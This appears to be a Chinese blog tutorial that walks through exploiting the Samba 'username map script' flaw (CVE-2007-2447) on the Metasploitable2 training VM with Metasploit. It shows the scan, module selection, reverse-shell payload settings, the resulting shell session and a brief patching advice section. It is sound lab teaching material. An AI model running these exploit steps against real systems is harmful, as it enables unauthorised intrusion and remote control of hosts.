• Matasploit漏洞利用 之 Samba漏洞利用演示


    Metasploitable2虚拟系统是一个特别制作的Ubuntu操作系统,主要用于安全工具测试和演示常见的漏洞攻击。

    在如下地址下载 Metasploitable2

    https://jaist.dl.sourceforge.net/project/metasploitable/Metasploitable2/

    下载之后在VMware打开即可使用。

    Metasploitable默认的用户名是 :msfadmin 密码是: msfadmin

    登陆之后使用ip addr 查看ip地址,本例中的IP地址是:192.168.59.132

    首先对linux目标机进行扫描,收集可用的服务信息。使用nmap扫描并查看系统开放端口和相关应用程序。

    msf5 > nmap -sV 192.168.59.132
    [*] exec: nmap -sV 192.168.59.132
    
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-09 20:02 CST
    Nmap scan report for 192.168.59.132
    Host is up (0.00025s latency).
    Not shown: 977 closed ports
    PORT     STATE SERVICE     VERSION
    21/tcp   open  ftp         vsftpd 2.3.4
    22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
    23/tcp   open  telnet      Linux telnetd
    25/tcp   open  smtp        Postfix smtpd
    53/tcp   open  domain      ISC BIND 9.4.2
    80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
    111/tcp  open  rpcbind     2 (RPC #100000)
    139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
    445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
    512/tcp  open  exec        netkit-rsh rexecd
    513/tcp  open  login?
    514/tcp  open  tcpwrapped
    1099/tcp open  java-rmi    GNU Classpath grmiregistry
    1524/tcp open  bindshell   Metasploitable root shell
    2049/tcp open  nfs         2-4 (RPC #100003)
    2121/tcp open  ftp         ProFTPD 1.3.1
    3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
    5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
    5900/tcp open  vnc         VNC (protocol 3.3)
    6000/tcp open  X11         (access denied)
    6667/tcp open  irc         UnrealIRCd
    8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
    8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
    MAC Address: 00:0C:29:EF:91:7E (VMware)
    Service Info: Hosts:  metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
    
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 12.86 seconds
    msf5 > 

    收集到目标相关信息后,为其选择正确的Exploit和合适的payload。从扫描结果中发现目标主机上运行着Samba 3.x服务。

    Samba是在linux和unix系统上实现SMB(Server  Message Block,信息服务块)协议的一款免费软件。SMB是一种在局域网上共享文件和打印机的通信协议,它在局域网内使用linux和Windows系统的机器之间提供文件及打印机等资源的共享服务。

    输入search samba命令搜索samba的漏洞利用模块,并选择合适的漏洞利用模块。

    msf5 > search samba
    
    Matching Modules
    ================
    
       #   Name                                                 Disclosure Date  Rank       Check  Description
       -   ----                                                 ---------------  ----       -----  -----------
       0   auxiliary/admin/smb/samba_symlink_traversal                           normal     No     Samba Symlink Directory Traversal
       1   auxiliary/dos/samba/lsa_addprivs_heap                                 normal     No     Samba lsa_io_privilege_set Heap Overflow
       2   auxiliary/dos/samba/lsa_transnames_heap                               normal     No     Samba lsa_io_trans_names Heap Overflow
       3   auxiliary/dos/samba/read_nttrans_ea_list                              normal     No     Samba read_nttrans_ea_list Integer Overflow
       4   auxiliary/scanner/rsync/modules_list                                  normal     No     List Rsync Modules
       5   auxiliary/scanner/smb/smb_uninit_cred                                 normal     Yes    Samba _netr_ServerPasswordSet Uninitialized Credential State
       6   exploit/freebsd/samba/trans2open                     2003-04-07       great      No     Samba trans2open Overflow (*BSD x86)
       7   exploit/linux/samba/chain_reply                      2010-06-16       good       No     Samba chain_reply Memory Corruption (Linux x86)
       8   exploit/linux/samba/is_known_pipename                2017-03-24       excellent  Yes    Samba is_known_pipename() Arbitrary Module Load
       9   exploit/linux/samba/lsa_transnames_heap              2007-05-14       good       Yes    Samba lsa_io_trans_names Heap Overflow
       10  exploit/linux/samba/setinfopolicy_heap               2012-04-10       normal     Yes    Samba SetInformationPolicy AuditEventsInfo Heap Overflow
       11  exploit/linux/samba/trans2open                       2003-04-07       great      No     Samba trans2open Overflow (Linux x86)
       12  exploit/multi/samba/nttrans                          2003-04-07       average    No     Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
       13  exploit/multi/samba/usermap_script                   2007-05-14       excellent  No     Samba "username map script" Command Execution
       14  exploit/osx/samba/lsa_transnames_heap                2007-05-14       average    No     Samba lsa_io_trans_names Heap Overflow
       15  exploit/osx/samba/trans2open                         2003-04-07       great      No     Samba trans2open Overflow (Mac OS X PPC)
       16  exploit/solaris/samba/lsa_transnames_heap            2007-05-14       average    No     Samba lsa_io_trans_names Heap Overflow
       17  exploit/solaris/samba/trans2open                     2003-04-07       great      No     Samba trans2open Overflow (Solaris SPARC)
       18  exploit/unix/http/quest_kace_systems_management_rce  2018-05-31       excellent  Yes    Quest KACE Systems Management Command Injection
       19  exploit/unix/misc/distcc_exec                        2002-02-01       excellent  Yes    DistCC Daemon Command Execution
       20  exploit/unix/webapp/citrix_access_gateway_exec       2010-12-21       excellent  Yes    Citrix Access Gateway Command Execution
       21  exploit/windows/fileformat/ms14_060_sandworm         2014-10-14       excellent  No     MS14-060 Microsoft Windows OLE Package Manager Code Execution
       22  exploit/windows/http/sambar6_search_results          2003-06-21       normal     Yes    Sambar 6 Search Results Buffer Overflow
       23  exploit/windows/license/calicclnt_getconfig          2005-03-02       average    No     Computer Associates License Client GETCONFIG Overflow
       24  exploit/windows/smb/group_policy_startup             2015-01-26       manual     No     Group Policy Script Execution From Shared Resource
       25  post/linux/gather/enum_configs                                        normal     No     Linux Gather Configurations
    
    
    msf5 > 

    然后Samba服务将返回漏洞利用模块的列表,按照各个漏洞将被利用成功的相对难易度进行排序。

    因为exploit/multi/samba/usermap_script被标记为Excellent,即最杰出的,为提高渗透成功率,这里选择此模块进行接下来的渗透。(最好选择excellent并且是最新的漏洞)

    有关漏洞的详细信息可以通过info命令查看。

    msf5 > info exploit/multi/samba/usermap_script 
    
           Name: Samba "username map script" Command Execution
         Module: exploit/multi/samba/usermap_script
       Platform: Unix
           Arch: cmd
     Privileged: Yes
        License: Metasploit Framework License (BSD)
           Rank: Excellent
      Disclosed: 2007-05-14
    
    Provided by:
      jduck <jduck@metasploit.com>
    
    Available targets:
      Id  Name
      --  ----
      0   Automatic
    
    Check supported:
      No
    
    Basic options:
      Name    Current Setting  Required  Description
      ----    ---------------  --------  -----------
      RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
      RPORT   139              yes       The target port (TCP)
    
    Payload information:
      Space: 1024
    
    Description:
      This module exploits a command execution vulnerability in Samba 
      versions 3.0.20 through 3.0.25rc3 when using the non-default 
      "username map script" configuration option. By specifying a username 
      containing shell meta characters, attackers can execute arbitrary 
      commands. No authentication is needed to exploit this vulnerability 
      since this option is used to map usernames prior to authentication!
    
    References:
      https://cvedetails.com/cve/CVE-2007-2447/
      OSVDB (34700)
      http://www.securityfocus.com/bid/23972
      http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534
      http://samba.org/samba/security/CVE-2007-2447.html
    
    msf5 > 

    输入use命令即可使用该漏洞利用模块。然后可以看到Metasploit命令提示符由msf5 > 变为msf5 exploit(multi/samba/usermap_script) > 

    msf5 > use exploit/multi/samba/usermap_script 
    msf5 exploit(multi/samba/usermap_script) > 

    输入show payloads即可查看该漏洞利用模块下可供选择的攻击载荷模块,因为目标机时linux机器,因此一定要选择linux的攻击载荷。

    msf5 exploit(multi/samba/usermap_script) > show payloads
    
    Compatible Payloads
    ===================
    
       #   Name                                Disclosure Date  Rank    Check  Description
       -   ----                                ---------------  ----    -----  -----------
       0   cmd/unix/bind_awk                                    normal  No     Unix Command Shell, Bind TCP (via AWK)
       1   cmd/unix/bind_busybox_telnetd                        normal  No     Unix Command Shell, Bind TCP (via BusyBox telnetd)
       2   cmd/unix/bind_inetd                                  normal  No     Unix Command Shell, Bind TCP (inetd)
       3   cmd/unix/bind_jjs                                    normal  No     Unix Command Shell, Bind TCP (via jjs)
       4   cmd/unix/bind_lua                                    normal  No     Unix Command Shell, Bind TCP (via Lua)
       5   cmd/unix/bind_netcat                                 normal  No     Unix Command Shell, Bind TCP (via netcat)
       6   cmd/unix/bind_netcat_gaping                          normal  No     Unix Command Shell, Bind TCP (via netcat -e)
       7   cmd/unix/bind_netcat_gaping_ipv6                     normal  No     Unix Command Shell, Bind TCP (via netcat -e) IPv6
       8   cmd/unix/bind_perl                                   normal  No     Unix Command Shell, Bind TCP (via Perl)
       9   cmd/unix/bind_perl_ipv6                              normal  No     Unix Command Shell, Bind TCP (via perl) IPv6
       10  cmd/unix/bind_r                                      normal  No     Unix Command Shell, Bind TCP (via R)
       11  cmd/unix/bind_ruby                                   normal  No     Unix Command Shell, Bind TCP (via Ruby)
       12  cmd/unix/bind_ruby_ipv6                              normal  No     Unix Command Shell, Bind TCP (via Ruby) IPv6
       13  cmd/unix/bind_socat_udp                              normal  No     Unix Command Shell, Bind UDP (via socat)
       14  cmd/unix/bind_zsh                                    normal  No     Unix Command Shell, Bind TCP (via Zsh)
       15  cmd/unix/generic                                     normal  No     Unix Command, Generic Command Execution
       16  cmd/unix/pingback_bind                               normal  No     Unix Command Shell, Pingback Bind TCP (via netcat)
       17  cmd/unix/pingback_reverse                            normal  No     Unix Command Shell, Pingback Reverse TCP (via netcat)
       18  cmd/unix/reverse                                     normal  No     Unix Command Shell, Double Reverse TCP (telnet)
       19  cmd/unix/reverse_awk                                 normal  No     Unix Command Shell, Reverse TCP (via AWK)
       20  cmd/unix/reverse_bash_telnet_ssl                     normal  No     Unix Command Shell, Reverse TCP SSL (telnet)
       21  cmd/unix/reverse_jjs                                 normal  No     Unix Command Shell, Reverse TCP (via jjs)
       22  cmd/unix/reverse_ksh                                 normal  No     Unix Command Shell, Reverse TCP (via Ksh)
       23  cmd/unix/reverse_lua                                 normal  No     Unix Command Shell, Reverse TCP (via Lua)
       24  cmd/unix/reverse_ncat_ssl                            normal  No     Unix Command Shell, Reverse TCP (via ncat)
       25  cmd/unix/reverse_netcat                              normal  No     Unix Command Shell, Reverse TCP (via netcat)
       26  cmd/unix/reverse_netcat_gaping                       normal  No     Unix Command Shell, Reverse TCP (via netcat -e)
       27  cmd/unix/reverse_openssl                             normal  No     Unix Command Shell, Double Reverse TCP SSL (openssl)
       28  cmd/unix/reverse_perl                                normal  No     Unix Command Shell, Reverse TCP (via Perl)
       29  cmd/unix/reverse_perl_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via perl)
       30  cmd/unix/reverse_php_ssl                             normal  No     Unix Command Shell, Reverse TCP SSL (via php)
       31  cmd/unix/reverse_python                              normal  No     Unix Command Shell, Reverse TCP (via Python)
       32  cmd/unix/reverse_python_ssl                          normal  No     Unix Command Shell, Reverse TCP SSL (via python)
       33  cmd/unix/reverse_r                                   normal  No     Unix Command Shell, Reverse TCP (via R)
       34  cmd/unix/reverse_ruby                                normal  No     Unix Command Shell, Reverse TCP (via Ruby)
       35  cmd/unix/reverse_ruby_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via Ruby)
       36  cmd/unix/reverse_socat_udp                           normal  No     Unix Command Shell, Reverse UDP (via socat)
       37  cmd/unix/reverse_ssl_double_telnet                   normal  No     Unix Command Shell, Double Reverse TCP SSL (telnet)
       38  cmd/unix/reverse_zsh                                 normal  No     Unix Command Shell, Reverse TCP (via Zsh)
    
    msf5 exploit(multi/samba/usermap_script) > 

    这里选择基础的cmd/unix/reverse反向攻击载荷模块。并设置目标IP、端口、本地IP等,设置完成后,可以再次确认参数配置是否正确。

    msf5 exploit(multi/samba/usermap_script) > set PAYLOAD cmd/unix/reverse
    PAYLOAD => cmd/unix/reverse
    msf5 exploit(multi/samba/usermap_script) > show options 
    
    Module options (exploit/multi/samba/usermap_script):
    
       Name    Current Setting  Required  Description
       ----    ---------------  --------  -----------
       RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
       RPORT   139              yes       The target port (TCP)
    
    
    Payload options (cmd/unix/reverse):
    
       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       LHOST                   yes       The listen address (an interface may be specified)
       LPORT  4444             yes       The listen port
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Automatic
    
    
    msf5 exploit(multi/samba/usermap_script) > set RHOSTS 192.168.59.132
    RHOSTS => 192.168.59.132
    msf5 exploit(multi/samba/usermap_script) > set RPORT 445
    RPORT => 445
    msf5 exploit(multi/samba/usermap_script) > set LHOST 192.168.59.128
    LHOST => 192.168.59.128
    msf5 exploit(multi/samba/usermap_script) > show options 
    
    Module options (exploit/multi/samba/usermap_script):
    
       Name    Current Setting  Required  Description
       ----    ---------------  --------  -----------
       RHOSTS  192.168.59.132   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
       RPORT   445              yes       The target port (TCP)
    
    
    Payload options (cmd/unix/reverse):
    
       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       LHOST  192.168.59.128   yes       The listen address (an interface may be specified)
       LPORT  4444             yes       The listen port
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Automatic
    
    
    msf5 exploit(multi/samba/usermap_script) > 

    设置完所有参数变量后,输入攻击命令exploit或者run,发动攻击。

    MSF发动攻击成功后会获取目标主机的shell,为了验证该shell是目标主机的,可以查询主机名、用户名和IP地址,并与目标主机进行对比。

    msf5 exploit(multi/samba/usermap_script) > exploit
    
    [*] Started reverse TCP double handler on 192.168.59.128:4444 
    [*] Accepted the first client connection...
    [*] Accepted the second client connection...
    [*] Command: echo MhCC0KHN41rUi5op;
    [*] Writing to socket A
    [*] Writing to socket B
    [*] Reading from sockets...
    [*] Reading from socket B
    [*] B: "MhCC0KHN41rUi5op
    "
    [*] Matching...
    [*] A is input...
    [*] Command shell session 1 opened (192.168.59.128:4444 -> 192.168.59.132:41441) at 2020-05-09 20:16:34 +0800
    
    hostname
    metasploitable
    
    uname -a
    Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
    
    ip addr
    1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue 
        link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
        inet 127.0.0.1/8 scope host lo
        inet6 ::1/128 scope host 
           valid_lft forever preferred_lft forever
    2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000
        link/ether 00:0c:29:ef:91:7e brd ff:ff:ff:ff:ff:ff
        inet 192.168.59.132/24 brd 192.168.59.255 scope global eth0
        inet6 fe80::20c:29ff:feef:917e/64 scope link 
           valid_lft forever preferred_lft forever
    3: eth1: <BROADCAST,MULTICAST> mtu 1500 qdisc noop qlen 1000
        link/ether 00:0c:29:ef:91:88 brd ff:ff:ff:ff:ff:ff

    防御方法:

    Samba服务漏洞发生在Samba版本3.0.20~3.0.25rc3中,当使用非默认用户名映射脚本配置时,通过制动一个用户名包含shell元字符,攻击者可以执行任意命令。将samba升级到最新版本即可防御本漏洞。

  • 相关阅读:
    eclipse自动切换到debug视图
    Android Studio 1.1.0 “关联源码” 或者“导入源码” ,又或者插件包
    Eclipse中如何安装和使用GrepCode插件 (转)
    转【Python】同时向控制台和文件输出日志logging
    AngularJs学习
    MongoDB聚合运算之mapReduce函数的使用(11)
    MongoDB聚合运算之group和aggregate聚集框架简单聚合(10)
    MongoDB的分片(9)
    MongoDB replication set副本集(主从复制)(8)(转)
    MongoDB的导入导出(7)
  • 原文地址:https://www.cnblogs.com/zhengna/p/12860480.html
Copyright © 2020-2023  润新知